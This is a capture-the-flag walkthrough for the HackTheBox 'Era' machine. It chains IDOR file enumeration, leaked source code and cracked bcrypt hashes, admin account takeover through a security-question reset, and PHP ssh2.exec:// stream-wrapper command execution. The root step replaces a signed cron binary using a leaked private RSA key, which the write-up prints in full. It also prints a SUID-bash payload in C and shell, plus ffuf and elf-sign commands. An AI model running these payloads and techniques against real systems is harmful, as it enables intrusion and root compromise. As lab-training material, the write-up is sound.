Recon

1
$ rustscan -a $target_ip --ulimit 2000 -r 1-65535 -- -A -sC -Pn
2

3
PORT   STATE SERVICE REASON  VERSION
4
21/tcp open  ftp     syn-ack vsftpd 3.0.5
5
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
6
|_http-favicon: Unknown favicon MD5: 0309B7B14DF62A797B431119ADB37B14
7
| http-methods:
8
|_  Supported Methods: GET HEAD
9
|_http-server-header: nginx/1.18.0 (Ubuntu)
10
|_http-title: Era Designs
11
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Unusual Footing: FTP Wide Open, but SSH Nowhere in Sight

🌐 Web Application Overview#

The target is a sleek design agency with a minimal web front, showcasing a few high-profile users.

alt text

Visually, the site appears minimal, with nothing immediately standing out.

This writeup is password protected 🔒

Subdomain

1
$ ffuf -c -u "http://era.htb" -H "Host: FUZZ.era.htb" -w ~/wordlists/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt -t 50 -fs 154
2

3
        /'___\  /'___\           /'___\
4
       /\ \__/ /\ \__/  __  __  /\ \__/
5
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
6
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
7
         \ \_\   \ \_\  \ \____/  \ \_\
8
          \/_/    \/_/   \/___/    \/_/
9

10
       v2.1.0
11
________________________________________________
12

13
 :: Method           : GET
14
 :: URL              : http://era.htb
15
 :: Wordlist         : FUZZ: /home/Axura/wordlists/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt
16
 :: Header           : Host: FUZZ.era.htb
17
 :: Follow redirects : false
18
 :: Calibration      : false
19
 :: Timeout          : 10
20
 :: Threads          : 50
21
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
22
 :: Filter           : Response size: 154
23
________________________________________________
24

25
file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 226ms]
26
:: Progress: [7920/1613291] :: Job [1/1] :: 230 req/sec :: Duration: [0:00:38] :: Errors: 0 ::

Discovered file.era.htb, a file management portal featuring upload capabilities, accessible only after login.

However, a backup entry point appears to be lurking beneath the surface.

An alternative login route is available through a security question challenge.

Tried to log in with different usernames—invalid ones give a clean User not found. Which clearly opens the door to user enumeration.

Dirsearch

A classic dirsearch scan is used to crawl the subdomain for hidden directories.

1
$ dirsearch -u 'http://file.era.htb' -x 404
2

3
  _|. _ _  _  _  _ _|_    v0.4.3.post1
4
 (_||| _) (/_(_|| (_| )
5

6
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
7

8
Output File: /home/Axura/ctf/HTB/era/reports/http_file.era.htb/_25-07-26_19-51-54.txt
9

10
Target: http://file.era.htb/
11

12
[19:51:54] Starting:
13
[19:53:03] 301 -  178B  - /assets  ->  http://file.era.htb/assets/
14
[19:53:04] 403 -  564B  - /assets/
15
[19:53:28] 302 -    0B  - /download.php  ->  login.php
16
[19:53:35] 301 -  178B  - /files  ->  http://file.era.htb/files/
17
[19:53:35] 403 -  564B  - /files/
18
[19:53:35] 403 -  564B  - /files/cache/
19
[19:53:35] 403 -  564B  - /files/tmp/
20
[19:53:44] 301 -  178B  - /images  ->  http://file.era.htb/images/
21
[19:53:44] 403 -  564B  - /images/
22
[19:53:56] 200 -   34KB - /LICENSE
23
[19:53:58] 200 -    9KB - /login.php
24
[19:54:01] 200 -   70B  - /logout.php
25
[19:54:03] 302 -    0B  - /manage.php  ->  login.php
26
[19:54:27] 200 -    3KB - /register.php
27
[19:54:43] 302 -    0B  - /upload.php  ->  login.php
28

29
Task Completed

Discovered a hidden register.php endpoint on the site.

After registering a new account, we can log in to the file management system.

IDOR

ID Enumeration

After accessing the file management system with our registered account, we upload a test file to probe functionality.

alt text

It responds with a download URL like http://file.era.htb/download.php?id=7638. Tampering with the id parameter such as testing id=1 results in a clear rejection.

Classic IDOR fingerprint. Time to bring in BurpSuite Intruder or fuzz the id parameter manually with ffuf

1
$ ffuf -u http://file.era.htb/download.php?id=FUZZ -b "PHPSESSID=o3v60htqgmni2m6igo4ilhi47v" -w <(seq 1 1000) -t 50 -fs 0 -mr ".zip" -c
2

3
        /'___\  /'___\           /'___\
4
       /\ \__/ /\ \__/  __  __  /\ \__/
5
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
6
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
7
         \ \_\   \ \_\  \ \____/  \ \_\
8
          \/_/    \/_/   \/___/    \/_/
9

10
       v2.1.0-dev
11
________________________________________________
12

13
 :: Method           : GET
14
 :: URL              : http://file.era.htb/download.php?id=FUZZ
15
 :: Wordlist         : FUZZ: /proc/self/fd/11
16
 :: Header           : Cookie: PHPSESSID=o3v60htqgmni2m6igo4ilhi47v
17
 :: Follow redirects : false
18
 :: Calibration      : false
19
 :: Timeout          : 10
20
 :: Threads          : 50
21
 :: Matcher          : Regexp: .zip
22
 :: Filter           : Response size: 0
23
________________________________________________
24

25
54                      [Status: 200, Size: 6378, Words: 2552, Lines: 222, Duration: 375ms]
26
150                     [Status: 200, Size: 6366, Words: 2552, Lines: 222, Duration: 195ms]
27
:: Progress: [1000/1000] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

Beyond our upload, two notable files appear at IDs 150 and 54:

ID 150: signing.zip

ID 54: site-backup-30-08-24.zip

We download and extract both archive files.

1
$ ll
2
total 2.0M
3
-rw-r--r-- 1 kali kali 2.7K Jul 01 20:24 signing.zip
4
-rw-r--r-- 1 kali kali 2.0M Jul 01 20:24 site-backup-30-08-24.zip
5

6
$ unzip signing.zip -d signing
7
Archive:  signing.zip
8
  inflating: signing/key.pem
9
  inflating: signing/x509.genkey
10

11
$ unzip site-backup-30-08-24.zip -d backup
12
Archive:  site-backup-30-08-24.zip
13
  inflating: backup/LICENSE
14
  inflating: backup/bg.jpg
15
   creating: backup/css/
16
  inflating: backup/css/main.css.save
17
  inflating: backup/css/main.css
18
  inflating: backup/css/fontawesome-all.min.css
19
  inflating: backup/css/noscript.css
20
   creating: backup/css/images/
21
 extracting: backup/css/images/overlay.png
22
  inflating: backup/download.php
23
  inflating: backup/filedb.sqlite
24
   creating: backup/files/
25
  inflating: backup/files/.htaccess
26
 extracting: backup/files/index.php
27
  inflating: backup/functions.global.php
28
  inflating: backup/index.php
29
  inflating: backup/initial_layout.php
30
  inflating: backup/layout.php
31
  inflating: backup/layout_login.php
32
  inflating: backup/login.php
33
  inflating: backup/logout.php
34
  inflating: backup/main.png
35
  inflating: backup/manage.php
36
  inflating: backup/register.php
37
  inflating: backup/reset.php
38

39
  ...

Downloads

Signing

The signing.zip contains two key files essential for certificate-based cryptography.

File	Description
key.pem	A private key file in PEM format, used for signing certificates, creating JWT signatures, or enabling HTTPS.
x509.genkey	An OpenSSL configuration file or key generation template

If the application uses this key to sign requests, cookies, or tokens, it’s game over we gain the power to forge trusted credentials.

Check Backup

The file site-backup-30-08-24.zip is a treasure trove containing the full source code and database dump.

1
$ tree backup
2

3
backup
4
├── bg.jpg
5
├── css
6
│   ├── fontawesome-all.min.css
7
│   ├── images
8
│   │   └── overlay.png
9
│   ├── main.css
10
│   ├── main.css.save
11
│   └── noscript.css
12
├── download.php
13
├── filedb.sqlite
14
├── files
15
│   └── index.php
16
├── functions.global.php
17
├── index.php
18
├── initial_layout.php
19
├── layout_login.php
20
├── layout.php
21
├── LICENSE
22
├── login.php
23
├── logout.php
24
├── main.png
25
├── manage.php
26
├── register.php
27
├── reset.php
28
├── ...
29

30
10 directories, 62 files

We can access the database using sqlite3:

1
$ sqlite3 backup/filedb.sqlite
2
SQLite version 3.49.1 2025-02-18 13:38:58
3
Enter ".help" for usage hints.
4

5
sqlite> .tables
6
files  users
7

8
sqlite> SELECT * FROM users;
9
1|admin_ef01cab31aa|$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC|600|Maria|Oliver|Ottawa
10
2|eric|$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm|-1|||
11
3|veronica|$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK|-1|||
12
4|yuri|$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.|-1|||
13
5|john|$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6|-1|||
14
6|ethan|$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC|-1|||

The password hashes use bcrypt, but due to low cost factors, we successfully cracked the passwords for eric and yuri.

1
eric: america
2
yuri: mustang

> The same credentials were confirmed earlier through brute force, though the password for the admin user `admin_ef01cab31aa` remains uncrackable.

Source Dive

We’ve now gathered a substantial set of resources for analysis.

1
$ tree . -L2
2

3
.
4
├── apache2_conf
5
│   ├── 000-default.conf
6
│   ├── apache2.conf
7
│   ├── file.conf
8
│   └── ports.conf
9
├── backup
10
│   ├── bg.jpg
11
│   ├── css
12
│   ├── download.php
13
│   ├── filedb.sqlite
14
│   ├── files
15
│   ├── functions.global.php
16
│   ├── index.php
17
│   ├── initial_layout.php
18
│   ├── layout_login.php
19
│   ├── layout.php
20
│   ├── LICENSE
21
│   ├── login.php
22
│   ├── logout.php
23
│   ├── main.png
24
│   ├── manage.php
25
│   ├── register.php
26
│   ├── reset.php
27
│   ├── sass
28
│   ├── screen-download.png
29
│   ├── screen-login.png
30
│   ├── screen-main.png
31
│   ├── screen-manage.png
32
│   ├── screen-upload.png
33
│   ├── security_login.php
34
│   ├── upload.php
35
│   └── webfonts
36
├── php8.1_conf
37
│   ├── build
38
│   ├── calendar.so
39
│   ├── ctype.so
40
│   ├── dom.so
41
│   ├── exif.so
42
│   ├── ffi.so
43
│   ├── fileinfo.so
44
│   ├── ftp.so
45
│   ├── gettext.so
46
│   ├── iconv.so
47
│   ├── opcache.so
48
│   ├── pdo.so
49
│   ├── pdo_sqlite.so
50
│   ├── phar.so
51
│   ├── posix.so
52
│   ├── readline.so
53
│   ├── shmop.so
54
│   ├── simplexml.so
55
│   ├── sockets.so
56
│   ├── sqlite3.so
57
│   ├── ssh2.so
58
│   ├── sysvmsg.so
59
│   ├── sysvsem.so
60
│   ├── sysvshm.so
61
│   ├── tokenizer.so
62
│   ├── xmlreader.so
63
│   ├── xml.so
64
│   ├── xmlwriter.so
65
│   ├── xsl.so
66
│   └── zip.so
67
└── signing
68
    ├── key.pem
69
    └── x509.genkey

We can start some code auditing work on the found backup source code.

1. upload.php

We begin with upload.php, as it provides direct file input interaction potential for upload-based exploitation.

1
if ($_POST['fsubmitted'] == "true") {
2

3
    $target_dir = "files/";
4

5
    // If the user is uploading multiple files, we'll ZIP them
6
    if (count($_FILES["upfile"]["name"]) > 1) {
7
        $target_file = $target_dir . "Era_User$currentUser " . date('Y-m-d H_i_s') . ".zip";
8
    } else {
9
        $target_file = $target_dir . basename($_FILES["upfile"]["name"][0]);
10
    }
11

12
    $uploadOk = true;

All uploaded files (including ZIPs) are stored in the /files/ directory — a predictable and accessible path.
Multi-file upload results in a .zip archive, named using the user ID and a timestamp.
Single file upload is saved as-is using basename(), giving the user control over the filename and extension.
No extension sanitization potentially dangerous types like .php, .phar, etc., are accepted.

1
    // Check for harmful patterns
2
    if (strpos($target_file, "'") !== false || strpos($target_file, '"') !== false) {
3
        echo '<div class="upload-error">Error: Tampering attempt detected.</div>';
4
        $uploadOk = false;
5
    }
6

7
    $fileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

Attempts to block ' and " in filenames. That’s it.
No restriction on file types, content, or MIME dangerously flexible.

1
       if ($file_upload_complete) {
2
            $newFileId = rand(1, 9999);
3
            while (in_array($newFileId, $fileListId)) {
4
                $newFileId = rand(1, 9999);
5
            }
6

7
            $current_date = time();
8

9
            $publish = contactDB("INSERT INTO files (fileid, filepath, fileowner, filedate)
10
                                  VALUES ($newFileId, '$target_file', $currentUser, $current_date);", 0);
11

12
            echo '<div class="upload-success">Upload Successful!</div>';
13

14
            $download_link = get_download_link($newFileId);

File metadata resides in a SQLite files table, indexed by a fileid between 1–9999 making it a low-entropy IDOR target. Download links are served via the get_download_link() function. The upload script accepts arbitrary file types, including .php and .phar, though current conditions prevent direct exploitation. Uploaded files are placed in a non-executable /files/ directory, blocking .php execution. No LFI is present to trigger uploads, and no unserialize() calls on user-controlled phar:// paths have been identified yet.

Conclusion: while the upload mechanism is insecure by design, it remains non-exploitable in the current environment.

2.download.php

1
if (!isset($_GET['id'])) {
2
  header('location: index.php'); // user loaded without requesting file by id
3
  die();
4
}
5

6
if (!is_numeric($_GET['id'])) {
7
  header('location: index.php'); // user requested non-numeric (invalid) file id
8
  die();
9
}
10

11
$reqFile = $_GET['id'];
12

13
$fetched = contactDB("SELECT * FROM files WHERE fileid='$reqFile';", 1);

If the requested file exists, it proceeds to return it:

1
$realFile = (count($fetched) != 0); // Set realFile to true if we found the file id, false if we didn't find it
2

3
if (!$realFile) {
4
  echo deliverTop("Era - Download");
5

6
  echo deliverMiddle("File Not Found", "The file you requested doesn't exist on this server", "");
7

8
  echo deliverBottom();
9
} else {
10
  $fileName = str_replace("files/", "", $fetched[0]);
11

12

13
  // Allow immediate file download
14
  if ($_GET['dl'] === "true") {
15

16
    header('Content-Type: application/octet-stream');
17
    header("Content-Transfer-Encoding: Binary");
18
    header("Content-disposition: attachment; filename=\"" .$fileName. "\"");
19
    readfile($fetched[0]);
20

21
    ...
22

23
}

Although the dl=true parameter doesn’t appear in the URL, it is injected dynamically through the HTML source. The intriguing section lies under the show=true branch (highlighted in purple), active only for the admin user (erauser === 1). This code contains a critical logic flaw.

1
// Check if it's a wrapper (://)
2
if (strpos($format, '://') !== false) {
3
    // Treats it as a protocol wrapper
4
    // e.g. http://, file://, php://, etc.
5
    $wrapper = $format;
6
    header('Content-Type: application/octet-stream');
7
} else {
8
    $wrapper = '';
9
    header('Content-Type: text/html');
10
}
11

12
try {
13
    // Build the final file path
14
    $file = $fetched[0];
15
    // If a wrapper is set
16
    // [!] This constructs an arbitrary protocol + file path.
17
  $file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');
18

19
    ...
20

21
}

The $wrapper string is entirely attacker-controlled. By specifying wrappers like file://, php://, or ssh2://, an admin user can access arbitrary resources via stream wrappers—exemplifying a classic Arbitrary Protocol File Read (APFR) vulnerability.

With ssh2.so and phar.so modules present and presumably enabled, this vulnerability paves the way for:

LFI via file://
PHP filter chain attacks using php://filter
SSRF or RCE through ssh2://

3. reset.php

Before leveraging the Arbitrary Protocol Execution, privilege escalation to the admin account is required. Enter reset.php an unprotected IDOR vulnerability. No safeguards exist to stop low-privileged users from modifying security question answers for any account, including the admin admin_ef01cab31aa. By resetting the admin’s answers and leveraging the previously identified /security_login.php endpoint, the admin account can be hijacked.

Attack Execution

With all elements aligned, we can now orchestrate a full attack chain to obtain Remote Code Execution (RCE):

1. IDOR

The attack starts by exploiting the IDOR vulnerability in reset.php. Using Burp Suite Repeater, capture the POST request and substitute the username with admin_ef01cab31aa.

2. Admin Impersonation

Once reset, use the security_login.php endpoint to impersonate the admin: Once logged in, upload a dummy file to obtain a valid file ID. Then, capture the download request along with the admin session cookie using Burp Suite.

Send the request to Repeater and test the stream wrapper logic using the file:// protocol with an existing ID, such as 54 or 150. This confirms successful access to the stream wrapper execution path with admin privileges.

3. Abuse SSH2 Stream

> PHP | ssh2://

Since ssh2.so is enabled (confirmed via the downloaded PHP config), we can leverage the ssh2.exec:// protocol, which opens an SSH connection and executes a remote command.

From PHP docs, available stream wrappers include:

ssh2.shell://
ssh2.exec://
ssh2.tunnel://
ssh2.sftp://
ssh2.scp://

This means we can achieve remote command execution via ssh2.exec://:

1
ssh2.exec://user:pass@example.com:22/usr/local/bin/some_command

This example establishes an SSH connection to example.com, performs authentication, and executes some_command.

SSRF to RCE

This functions as an SSRF primitive using protocol smuggling, ultimately enabling command execution.

Exploit

> step-1

Upload any file to obtain its file ID, open the download request in Burp, send it to Repeater, and modify the format parameter in the URL.

By targeting the local SSH service and authenticating as yuri (credentials previously obtained), we can craft a reverse shell payload.

NOTE
Insert this into the Burp Repeater URL and URL-encode it (Ctrl+U) within the format= parameter.

Login To user Eric

alt text

since we dont have flag lets login to another user called eric we already have passowrd of user eric:america

1
yuri@era:/home$ su - eric
2
su - eric
3
password : america
4
ls
5
user.txt
6
cat *
7
vdadar8s5daaccsff******

ROOT

Begin by establishing a stable shell as the user eric.

1
script -c bash /dev/null

Internal Footprinting

LinPEAS

1
╔══════════╣ Readable files belonging to root and readable by me but not world readable
2
-rw-r----- 1 root eric 33 Jul 27 01:12 /home/eric/user.txt
3
-rwxrw---- 1 root devs 16544 Jul 27 08:15 /opt/AV/periodic-checks/monitor
4
-rw-rw---- 1 root devs 103 Jul 27 08:15 /opt/AV/periodic-checks/status.log
5

6
╔══════════╣ Unexpected in /opt (usually empty)
7
total 12
8
drwxrwxr-x  3 root root 4096 Jul 22 08:42 .
9
drwxr-xr-x 20 root root 4096 Jul 22 08:41 ..
10
drwxrwxr--  3 root devs 4096 Jul 22 08:42 AV
11

12
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
13
/home/eric/.gnupg/trustdb.gpg
14
/home/eric/.gnupg/pubring.kbx
15
/opt/AV/periodic-checks/monitor
16
/opt/AV/periodic-checks/status.log

This strongly indicates that something noteworthy resides under /opt.

1
eric@era:~$ ls -aRhl /opt
2

3
/opt:
4
total 12K
5
drwxrwxr-x  3 root root 4.0K Jul 22 08:42 .
6
drwxr-xr-x 20 root root 4.0K Jul 22 08:41 ..
7
drwxrwxr--  3 root devs 4.0K Jul 22 08:42 AV
8

9
/opt/AV:
10
total 12K
11
drwxrwxr-- 3 root devs 4.0K Jul 22 08:42 .
12
drwxrwxr-x 3 root root 4.0K Jul 22 08:42 ..
13
drwxrwxr-- 2 root devs 4.0K Jul 27 08:22 periodic-checks
14

15
/opt/AV/periodic-checks:
16
total 32K
17
drwxrwxr-- 2 root devs 4.0K Jul 27 08:22 .
18
drwxrwxr-- 3 root devs 4.0K Jul 22 08:42 ..
19
-rwxrw---- 1 root devs  17K Jul 27 08:22 monitor
20
-rw-rw---- 1 root devs  205 Jul 27 08:22 status.log

The monitor binary is owned by root, yet both it and status.log have group write permissions for the devs group, which includes eric presenting a clear avenue for privilege escalation.

Core Elements

Binary Takeover

1
eric@era:~$ file /opt/AV/periodic-checks/monitor
2

3
/opt/AV/periodic-checks/monitor: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=45a4bb1db5df48dcc085cc062103da3761dd8eaf, for GNU/Linux 3.2.0, not stripped

The monitor binary runs with root privileges, but since the devs group has write access to its parent directories—and eric is part of that group we’re able to rename or replace it without restriction.

1
eric@era:/opt/AV/periodic-checks$ chmod +x monitor
2
chmod: changing permissions of 'monitor': Operation not permitted
3

4
eric@era:/opt/AV/periodic-checks$ mv monitor monitor.bak
5
mv monitor monitor.bak
6

7
eric@era:/opt/AV/periodic-checks$ ll
8
drwxrwxr-- 2 root devs  4096 Jul 27 08:26 ./
9
drwxrwxr-- 3 root devs  4096 Jul 22 08:42 ../
10
-rwxrw---- 1 root devs 16544 Jul 27 08:26 monitor.bak
11
-rw-rw---- 1 root devs   307 Jul 27 08:26 status.log

This creates a textbook case of binary replacement, allowing us to plant a payload that gets executed with elevated privileges.

2. Scheduled Task

Frequent updates to status.log suggest it’s actively maintained by the monitor binary.

1
eric@era:~$ cat /opt/AV/periodic-checks/status.log
2

3
[*] System scan initiated...
4
[*] No threats detected. Shutting down...
5
[SUCCESS] No threats detected.

This suggests:

A scheduled task, likely executed by root, runs the monitor binary. With the ability to replace it, we effectively control what code is executed with root privileges.

3. Signature

Self Signed

Simply replacing monitor won’t suffice it’s guarded by a signature verification check. For instance, swapping it with a basic bash script would fail validation.

1
eric@era:/opt/AV/periodic-checks$ mv monitor monitor.bak
2

3
eric@era:/opt/AV/periodic-checks$ echo -e '#!/bin/bash\nchmod +s /bin/bash' > monitor
4

5
eric@era:/opt/AV/periodic-checks$ ls
6
monitor  monitor.bak  status.log
7

8
eric@era:/opt/AV/periodic-checks$ cat monitor
9
#!/bin/bash
10
chmod +s /bin/bash

The status.log file logs the error from the most recent execution attempt.

1
eric@era:/opt/AV/periodic-checks$ cat status.log
2

3
[*] System scan initiated...
4
[*] No threats detected. Shutting down...
5
[SUCCESS] No threats detected.
6
objcopy: /opt/AV/periodic-checks/monitor: file format not recognized
7
[ERROR] Executable not signed. Tampering attempt detected. Skipping.

This reveals that the binary needs to be a properly signed ELF executable. Notably, the signature is embedded within the ELF itself—rather than provided as an external .sig or .pem file. We can verify this by inspecting custom ELF sections.

1
eric@era:/opt/AV/periodic-checks$ readelf -S /opt/AV/periodic-checks/monitor | grep -i sig
2

3
  [28] .text_sig         PROGBITS         0000000000000000  00003040

The ELF binary includes a custom section called .text_sig. When the system invokes the monitor binary—likely through something like initiate_monitoring.sh it uses objcopy to extract this section and verifies it against the contents of the .text segment.

Therefore, we can utilize objdump to examine the contents of the section.

1
$ objdump -s -j .text_sig monitor
2

3
monitor:     file format elf64-x86-64
4

5
Contents of section .text_sig:
6
 0000 308201c6 06092a86 4886f70d 010702a0  0.....*.H.......
7
 0010 8201b730 8201b302 0101310d 300b0609  ...0......1.0...
8
 0020 60864801 65030402 01300b06 092a8648  `.H.e....0...*.H
9
 0030 86f70d01 07013182 01903082 018c0201  ......1...0.....
10
 0040 01306730 4f311130 0f060355 040a0c08  .0g0O1.0...U....
11
 0050 45726120 496e632e 31193017 06035504  Era Inc.1.0...U.
12
 0060 030c1045 4c462076 65726966 69636174  ...ELF verificat
13
 0070 696f6e31 1f301d06 092a8648 86f70d01  ion1.0...*.H....
14
 0080 09011610 79757269 76696368 40657261  ....yurivich@era
15
 0090 2e636f6d 02146d63 4aa981e1 93a1e448  .com..mcJ......H
16
 00a0 c5205ff7 9b84e6b6 f50b300b 06096086  . _.......0...`.
17
 00b0 48016503 04020130 0d06092a 864886f7  H.e....0...*.H..
18
 00c0 0d010101 05000482 01006a8d 5090e77a  ..........j.P..z
19
 00d0 a22431d3 e629241a c7eec906 dce87592  .$1..)$.......u.
20
 00e0 c90733b8 5ea5c466 db04a35a 28648853  ..3.^..f...Z(d.S
21
 00f0 00f2775c fbe983ae 833d2c36 7030985a  ..w\.....=,6p0.Z
22
 0100 b5d9ae28 cfbf75db 8e402955 c9bef8d3  ...(..u..@)U....
23
 0110 058e6ee1 1eb435bb 30a3056d b85074bc  ..n...5.0..m.Pt.
24
 0120 4e15fc44 0a57e3f6 2f4b5ecd 0e6b222d  N..D.W../K^..k"-
25
 0130 c4039189 2c7ded05 fe45a3e9 c00f0610  ....,}...E......
26
 0140 f8a653ab f72571aa cbf2ff38 238658d0  ..S..%q....8#.X.
27
 0150 8dcfba33 1c6d2092 8c01c77d 4e49ea94  ...3.m ....}NI..
28
 0160 670c9de9 42779e09 67143d81 49209fc1  g...Bw..g.=.I ..
29
 0170 24005880 04c7cebf d398ec6d 55b50333  $.X........mU..3
30
 0180 db46f2ab 74e6aa24 e9dc76d2 c9c4183b  .F..t..$..v....;
31
 0190 991bc0f4 762b1c09 1d82317c aab31e88  ....v+....1|....
32
 01a0 dfc04871 2bb9ac8a 0dbb6cd7 cd6bdcaa  ..Hq+.....l..k..
33
 01b0 c96c2afe faa17944 ebdd7a6e 6f2e91da  .l*...yD..zno...
34
 01c0 5e41e0e6 5ddeec93 47ee               ^A..]...G.

The output reveals a standard ASN.1 DER-encoded format containing elements such as:

Era Inc. (Issuer)
ELF verification (Common Name)
yurivich@era.com (Email)
An extensive RSA signature block

This confirms the system validates binaries by extracting the .text_sig section and checking its integrity, rejecting any unsigned or altered binaries.

OpenSSL Config

Previously, we identified a signing mechanism located within the FTP share:

1
$ tree signing
2

3
signing
4
├── key.pem
5
└── x509.genkey

1
[ req ]
2
default_bits = 2048
3
distinguished_name = req_distinguished_name
4
prompt = no
5
string_mask = utf8only
6
x509_extensions = myexts
7

8
[ req_distinguished_name ]
9
O = Era Inc.
10
CN = ELF verification
11
emailAddress = yurivich@era.com
12

13
[ myexts ]
14
basicConstraints=critical,CA:FALSE
15
keyUsage=digitalSignature
16
subjectKeyIdentifier=hash
17
authorityKeyIdentifier=keyid

This aligns with the signature details observed earlier.

The [ myexts ] section verifies that the certificate is meant solely for digital signatures, without any Certificate Authority capabilities.

Private RSA Key

actual private key:

1
$ file key.pem
2

3
key.pem: OpenSSH private key (no password)

Nevertheless, executing:

1
$ openssl rsa -in key.pem -check
2

3
RSA key ok
4
writing RSA key
5
-----BEGIN PRIVATE KEY-----
6
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCqKH30+RZjkxiV
7
JMnuB6b1dDbWUaw3p2QyQvWMbFvsi7zG1kE2LBrKjsEyvcxo8m0wL9feuFiOlciD
8
MamELMAW0UjMyew01+S+bAEcOawH81bVahxNkA4hHi9d/rysTe/dnNkh08KgHhzF
9
mTApjbV0MQwUDOLXSw9eHd+1VJClwhwAsL4xdk4pQS6dAuJEnx3IzNoQ23f+dPqT
10
CMAAWST67VPZjSjwW1/HHNi12ePewEJRGB+2K+YeGj+lxShW/I1jYEHnsOrliM2h
11
ZvOLqS9LjhqfI9+Q1RxIQF69yAEUeN4lYupa0Ghr2h96YLRE5YyXaBxdSA4gLGOV
12
HZgMl2i/AgMBAAECggEALCO53NjamnT3bQTwjtsUT9rYOMtR8dPt1W3yNX2McPWk
13
wC2nF+7j+kSC0G9UvaqZcWUPyfonGsG3FHVHBH75S1H54QnGSMTyVQU+WnyJaDyS
14
+2R9uA8U4zlpzye7+LR08xdzaed9Nrzo+Mcuq7DTb7Mjb3YSSAf0EhWMyQSJSz38
15
nKOcQBQhwdmiZMnVQp7X4XE73+2Wft9NSeedzCpYRZHrI820O+4MeQrumfVijbL2
16
xx3o0pnvEnXiqbxJjYQS8gjSUAFCc5A0fHMGmVpvL+u7Sv40mj/rnGvDEAnaNf+j
17
SlC9KdF5z9gWAPii7JQtTzWzxDinUxNUhlJ00df29QKBgQDsAkzNjHAHNKVexJ4q
18
4CREawOfdB/Pe0lm3dNf5UlEbgNWVKExgN/dEhTLVYgpVXJiZJhKPGMhSnhZ/0oW
19
gSAvYcpPsuvZ/WN7lseTsH6jbRyVgd8mCF4JiCw3gusoBfCtp9spy8Vjs0mcWHRW
20
PRY8QbMG/SUCnUS0KuT1ikiIYwKBgQC4kkKlyVy2+Z3/zMPTCla/IV6/EiLidSdn
21
RHfDx8l67Dc03thgAaKFUYMVpwia3/UXQS9TPj9Ay+DDkkXsnx8m1pMxV0wtkrec
22
pVrSB9QvmdLYuuonmG8nlgHs4bfl/JO/+Y7lz/Um1qM7aoZyPFEeZTeh6qM2s+7K
23
kBnSvng29QKBgQCszhpSPswgWonjU+/D0Q59EiY68JoCH3FlYnLMumPlOPA0nA7S
24
4lwH0J9tKpliOnBgXuurH4At9gsdSnGC/NUGHII3zPgoSwI2kfZby1VOcCwHxGoR
25
vPqt3AkUNEXerkrFvCwa9Fr5X2M8mP/FzUCkqi5dpakduu19RhMTPkdRpQKBgQCJ
26
tU6WpUtQlaNF1IASuHcKeZpYUu7GKYSxrsrwvuJbnVx/TPkBgJbCg5ObFxn7e7dA
27
l3j40cudy7+yCzOynPJAJv6BZNHIetwVuuWtKPwuW8WNwL+ttTTRw0FCfRKZPL78
28
D/WHD4aoaKI3VX5kQw5+8CP24brOuKckaSlrLINC9QKBgDs90fIyrlg6YGB4r6Ey
29
4vXtVImpvnjfcNvAmgDwuY/zzLZv8Y5DJWTe8uxpiPcopa1oC6V7BzvIls+CC7VC
30
hc7aWcAJeTlk3hBHj7tpcfwNwk1zgcr1vuytFw64x2nq5odIS+80ThZTcGedTuj1
31
qKTzxN/SefLdu9+8MXlVZBWj
32
-----END PRIVATE KEY-----

…verifies that this is a valid RSA private key compatible with OpenSSL signing functions. The private key matches the public key used in the signature verification process probably embedded in the script or retrieved from a secure store. This enables us to re-sign any custom ELF binary we create, as long as we maintain the .text_sig structure required by the verifier.

Exploit Overview

To hijack the privileged monitor binary, we first need to sign our malicious payload with the Era Inc. signature scheme.

Unlike typical Linux ELF binaries, which don’t include a .text_sig section by default, this custom section must have been appended after compilation.

The presence of .text_sig itself is a clue—it acts as a signature marker. After some research, we find that the binary is signed using linux-elf-binary-signer, a tool that embeds a cryptographic signature into a dedicated ELF section called .text_sig. This signature ensures the integrity of the .text segment.

With this understanding, the path forward is clear. Next, we’ll create a minimal SUID spawner:

1
/**
2
 * hacked.c
3
 */
4
#include <unistd.h>
5
#include <stdlib.h>
6

7
int main() {
8
    setuid(0);
9
    setgid(0);
10

11
    system("cp /bin/bash /tmp/pwn && chmod +s /tmp/pwn");
12

13
    return 0;
14
}

Compile

1
gcc -static -o pwn pwn.c

Next, utilize the leaked key.pem private key—using the same file for the x509 certificate since it includes the public key as well:

1
./elf-sign sha256 key.pem key.pem pwn monitor

This command signs pwn and generates monitor containing a valid .text_sig section:

1
$ ./elf-sign -h
2
Usage: elf-sign [-h] <hash-algo> <key> <x509> <elf-file> [<dest-file>]
3
=h, display the help and exit
4

5
Sign the <elf-file> to an optional <dest-file> with
6
private key in <key> and public key certificate in <x509>
7
and the digest algorithm specified by <hash-algo>. If no
8
<dest-file> is specified, the <elf-file> will be backup to
9
<elf-file>.old, and the original <elf-file> will be signed.
10

11
$ ./elf-sign sha256 key.pem key.pem pwn monitor
